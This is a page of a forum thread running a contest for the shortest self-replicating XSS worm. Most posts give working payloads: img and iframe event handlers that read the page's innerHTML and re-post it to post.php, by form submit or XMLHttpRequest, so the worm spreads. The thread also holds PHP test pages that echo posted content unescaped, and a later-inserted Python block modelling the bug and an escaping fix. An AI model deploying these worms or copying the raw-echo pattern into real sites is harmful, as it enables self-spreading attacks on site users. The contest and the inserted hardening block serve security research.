Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 17 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:40PM

@ma1 and SDC:

Maybe I am doing something wrong, but it seems both of your latest submissions grow:

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body>
<div>
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">XXX
</div>
</body>
</html>



Edited 1 time(s). Last edit at 01/09/2008 03:56PM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:41PM

yes it grows, u r right, shame on me hehe
to stop it growing you have to do:
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML+'</form>',submit(alert('XSS'))"></form>

anyway.. 166 bytes, u r the winner again :D

edit

ah no 160 bytes

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

but u are the winner still hehe

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 03:43PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 09, 2008 03:45PM

Can someone give me the current TOP THREE, according to RSnake's rules? I have completely lost track after the rule-change, change rollback and whatever.

Oh, my new submission by the way. This should work. [163 chars]

<form><img src="" onerror="i=parentNode,i.action=(i.method='post')+'.php',j=nextSibling,j.value='<form>'+i.innerHTML,i.submit(alert('xss'))"><input name="content">

And also, am I the first to use nextSibling? It's awesome (nextSibling that is).



Edited 1 time(s). Last edit at 01/09/2008 03:51PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:49PM

ahm.. .mario + ma1 + I dunno


.mario:
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

ma1:

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">


etc..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:58PM

8) must have a payload of "XSS" in an alert box

OK, these bend rule #8 a bit, but whatever...
<form><input name="content"><iframe onload="XSS:with(_=parentNode)submit(alert(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',146)))"

152!
<form>XSS<input name="content"><iframe onload="with(_=parentNode)submit(alert(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',145)))"

151!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 04:35PM

lol, I'm not sure if that's valid, but that's a killer idea xD

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 04:45PM

for what it is worth - if you read my post on XHR you would see that the latest version of Firefox automatically adds the content-type header, as does IE7, which thereby conforms to W3C standards

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 05:04PM

Host: sla.ckers.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://sla.ckers.org/forum/read.php?2,18790,19352
Cookie: phorum_session_v5=123%3A7753godessbunnieyeahdadadada1234
Pragma: no-cache
Cache-Control: no-cache

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 05:17PM

sorry sdc - I meant Firefox 2.0.0.11 adds the content type header for XHR (next time I won't assume anything)

POST /post.php HTTP/1.1
Host: xxxxxx.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xxxxxx.com.au/xss.tester.php
Content-Length: 148
Content-Type: application/xml
Proxy-Authorization: xxxxx
Pragma: no-cache
Cache-Control: no-cache
content=<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>



EDIT: To address the + encoding issue

151-byte XHR - only works with Firefox 2.0.0.11 and up and IE. No DOCTYPE issues

<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=<p>',parentNode.innerHTML,'<p>'))"></iframe><p>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 01/09/2008 05:45PM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 05:41PM

@ma1 - hahah, I don't think that payload quiiiiite cuts the mustard. I didn't say ".*XSS.*" ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 05:50PM

Yup, by my math it does look like .mario is in the lead with 154 bytes, no growth, correct payload and all the lovely infinite self replication a bad guy could ever want.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 05:54PM

Also, I think I was confusing people regarding the XHR stuff. I have since revised my post for anyone who thought they needed the content type:

http://sla.ckers.org/forum/read.php?2,18790,page=15#msg-19384

Because both FF 2.0.0.11 and the current version of IE 7.0 send it implicitly when it's not there, it's not required for the purpose of this contest.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 06:06PM

so by my estimates this puts me in the lead at 151 bytes

self replicating - tick
correct payload - tick
no doctype issues - tick
works in the latest (non beta) browsers - tick
doesn't break with url decoding - tick

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 06:29PM

@digi7al64 - yours does what it advertises, but for some reason or another, it's not working with the post.php page I showed:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">


<?php
echo $_POST[content];
?>



</body>
</html>


It's not URL encoding it when it's sending it, perhaps that's the problem? It shows up as blank when it's reflected, as if there is no content. Odd.

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 06:30PM by rsnake.

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 06:40PM

hahahaha

echo $_POST[content];

should be

echo $_POST['content'];


EDIT:
Being a .NET programmer it seems my knowledge of PHP is limited and your code will work.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 01/09/2008 06:49PM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 09, 2008 06:56PM

„<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B

Is there anything wrong with this 145 character submission? I do believe it is safe to assume there is no „ on the page (especially as I hadn't ever seen that character before). Also, I'm not really relying on knowing the DOM of the page. It must be safe to assume that the iframe has a parentNode (didn't RSnake say we can assume the page has a body?). This is my official submission as of now (since the change with decoding and the + character).

-Dan

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 07:08PM

@doctordan - you can assume nothing other than that this code will be included on the page... which for all we know could contain nothing other than the worm. Hence you need to add a parentNode, else you have doctype issues which make it invalid (at least this is what I have gathered from the discussion)

However if there is a body tag then I would have used _.innerHTML which makes my submission 143 bytes long

<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=<p id=_>',_.innerHTML,'<p>'))</script></p>


--------------------------------

@rsnake - this is the code I am using to test my code and it is logging fine

<?php
	$content = "";
	if (!empty($_POST['content'])) {
		$date=date("F j, Y, g:i a"); 
		$content = urldecode($_POST['content']);
		$post = $date.' - '.htmlspecialchars($content).'<br/>';
	}
	
	$filename = 'log.html';
	
	// Let's make sure the file exists and is writable first.
	if (is_writable($filename) && !empty($post)) {
		if (!$handle = fopen($filename, 'a')) {
			 echo "Cannot open file ($filename)";
			 exit;
		}
		// Write $somecontent to our opened file.
		if (fwrite($handle, $post) === FALSE) {
			echo "Cannot write to file ($filename)";
			exit;
		}
	
		fclose($handle);
	
	} else {
		echo "The file $filename is not writable";
	}

?>
<html>
<head></head>
<body>
<form method="post" action="post.php">
<textarea name="content" style="width: 100%; height: 100px;"><?php echo(htmlspecialchars($content));?></textarea>
<input type="submit" value="submit">
</form>
<?php
	echo ("<hr/>".$content."<hr/>".htmlspecialchars($content).'<hr/>');
?>
</body>
</html>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 4 time(s). Last edit at 01/09/2008 07:17PM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 07:20PM

the problem is that the auto-added header of firefox:
Content-Type: application/xml

should be:
Content-Type: application/x-www-form-urlencoded


Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat
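The three server-side points this part of the thread keeps circling (the implicit application/xml content type versus the form-urlencoded type the PHP test page expects, the bare '+' that decodes to a space, and the raw echo of the posted content) modelled in Python. This is an added example, not code from the thread or from any of its posters: parse_post is a stand-in for how PHP fills $_POST (assumption: only a form-urlencoded body is parsed into fields, anything else yields none), decode_again mirrors the extra urldecode() in the test harness posted above, and the sample bodies are constructed. reflect_escaped is the output-encoding fix that stops the reflected content from being treated as markup.

```python
"""Model of the post.php handling discussed in the thread (added example, not the
thread's code): how a form body is parsed, why a bare '+' is lost, why a second
urldecode() is harmful, and how escaping on output stops reflected markup."""
import html
from urllib.parse import parse_qs, unquote_plus, urlencode

FORM_TYPE = "application/x-www-form-urlencoded"

# Constructed sample bodies standing in for what a browser POSTs to post.php.
RAW_BODY = "content=<p>a+b</p>"                       # '+' and '<' sent literally, unencoded
ENCODED_BODY = urlencode({"content": "<p>a+b</p>"})  # content=%3Cp%3Ea%2Bb%3C%2Fp%3E


def parse_post(content_type, body):
    """Return the POST fields a PHP-style handler would see.

    Assumption, modelling PHP's $_POST: only a form-urlencoded body is decoded
    into fields. A body labelled application/xml (what the thread reports
    Firefox 2 sending when XHR omits the header) produces no fields at all,
    which is one way a reflected value comes back blank.
    """
    if content_type.split(";")[0].strip().lower() != FORM_TYPE:
        return {}
    # parse_qs applies unquote_plus: '+' becomes ' ', %XX becomes the byte.
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def decode_again(value):
    """What urldecode($_POST['content']) does in the harness above: the value was
    already decoded once, so a second pass turns literal '%3C' text into '<'."""
    return unquote_plus(value)


def reflect_raw(value):
    """Vulnerable reflection, as in the thread's post.php: echo $_POST['content'];"""
    return "<hr/>" + value + "<hr/>"


def reflect_escaped(value):
    """Hardened reflection: entity-encode before the value enters HTML context,
    so an <iframe onload=...> in stored content renders as text, not markup."""
    return "<hr/>" + html.escape(value, quote=True) + "<hr/>"


if __name__ == "__main__":
    cases = [("application/xml", RAW_BODY), (FORM_TYPE, RAW_BODY), (FORM_TYPE, ENCODED_BODY)]
    for ctype, body in cases:
        print(f"{ctype:38} {body!r:40} -> {parse_post(ctype, body)}")
    print(decode_again("%3Cb%3E"))          # double decoding manufactures markup
    print(reflect_raw("<p>a b</p>"))
    print(reflect_escaped("<p>a b</p>"))
```

Run stand-alone it prints the parsed fields for each case: the application/xml body yields nothing, the raw body loses its '+', and only the properly encoded body round-trips intact. The same library call that fixes the harness (html.escape, the equivalent of htmlspecialchars with ENT_QUOTES) is what turns every payload in this thread back into inert text when it is reflected.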

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 08:28PM

@DoctorDan - I will be testing both with and without DOCTYPE. I'd tell you if it works or not but I can't cut and paste (long story involving a crappy wireless router, which I shall not explain out of sheer humiliation out of having not bought a better WiFi). Annnnyway, just make sure it works with and without any other content on the page, and yes, it's safe to assume exotic chars are okay.

@digi7al64 - I'll test again tomorrow morning, but I suggest using the code I showed if you want to get a better approximation of what I'm using to test your code.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 10:55PM

My final submission :)

<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

132 chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/09/2008 11:02PM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 11:24PM

Gareth, you forgot alert('xss'), also you can drop the space between

src="" onerror

as well, I believe; also, on my test page it submits as

content=,<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

adding the extra , at the start of the content value

therefore your final XHR worm would be 144 bytes. Nice stuff!
,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 01/09/2008 11:37PM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: thornmaker
Date: January 09, 2008 11:34PM

Gareth's with an alert (143): <b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join(alert('XSS')))"></b>



Edited 2 time(s). Last edit at 01/09/2008 11:41PM by thornmaker.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 10, 2008 12:41AM

<img src="" onerror="appendChild(cloneNode(1));c=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send(['content=',c].join(''));alert('XSS')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 10, 2008 01:02AM

<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/10/2008 01:02AM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 02:17AM

Wow! Did I miss something, or are we right back where we started? Don't know about you guys, but I can't seem to get XHR to function without the proper content-type, and I do have the newest version of Firefox.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 02:25AM

Quote: "Thursday the 10th of January at 7PM GMT"

Is it over? Please say it's over!

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 02:28AM

Yeah free us from our sheer misery!

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 10, 2008 02:36AM

@Ronald

The contest doesn't require the content-type headers. + are not allowed either because they get converted to spaces unless the payload is correctly escaped.

I'm still fighting Mario's vector, I wish the contest was shorter I'm totally addicted :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 03:17AM

Well, without the headers the worm doesn't propagate. So those vectors are useless then; the x-www-form-urlencoded MIME type escapes the data properly. So, I can't see how anyone can win with a flawed vector?



Edited 1 time(s). Last edit at 01/10/2008 03:19AM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 10, 2008 03:20AM

Me neither - I couldn't get any of the vectors w/o content-type get running on various boxes with default settings.
